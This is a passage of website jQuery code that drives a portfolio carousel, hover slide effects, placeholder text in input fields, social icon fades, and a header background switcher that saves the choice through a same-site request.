}
var s_set_portfolio_interval_key = null;
function s_set_portfolio_interval() {
	s_set_portfolio_interval_key = setInterval(s_portfolio_prev, 5000);
}

function s_load_portfolio_carrousel_hover() {
	$('.portfolioHeaderSlide').hover(
		function() {
			if ($(this).hasClass('hasVideo')) {
				$(this).find('.portfolioHeaderInfo').slideDown('fast');
			} else {
				$(this).find('.portfolioSlider').slideUp('fast');
			}
			
		}, 
		function() {
			if ($(this).hasClass('hasVideo')) {
				$(this).find('.portfolioHeaderInfo').slideUp('fast');
			} else {
				$(this).find('.portfolioSlider').slideDown('fast');
			}
		}
	);
	$('.portfolioItemThumb').hover(
		function() {
			$(this).find('.portfolioItemSlider').slideUp('fast');
			
		}, 
		function() {
			$(this).find('.portfolioItemSlider').slideDown('fast');
		}
	);
	
}
function s_load_inline_input(selector) {
	var label_txt = $(selector).val();
	$(selector).focus(function() {
		if ($(this).val() == label_txt) $(this).val('');
	});
	$(selector).blur(function() {
		if ($(this).val() == '') $(this).val(label_txt);
	});
}
$(function() {
	s_load_cufon();
	s_load_lavalamp();
	s_load_logo_hover();
	//s_load_tipsy();
	s_load_inline_input('#footer .form-text');
	s_load_inline_input('#portfolio-search');
	s_load_portfolio_carrousel();
	s_load_portfolio_carrousel_hover();
	$('.socialIcons a').hover(
		function() {$(this).animate({opacity: 1}, 'fast');	}, 
		function() {$(this).animate({opacity: 0.5}, 'fast');	}
	);
});

function switchBackground(pos, e){
	$($(e).parents('ul').get(0)).children('li').removeClass('active');
	$($(e).parents('li').get(0)).addClass('active');
	$('#header').css({backgroundPosition: 'center -'+(pos * 650)+'px'});
	$.ajax({url: '/', data: {set_background: pos}});
};

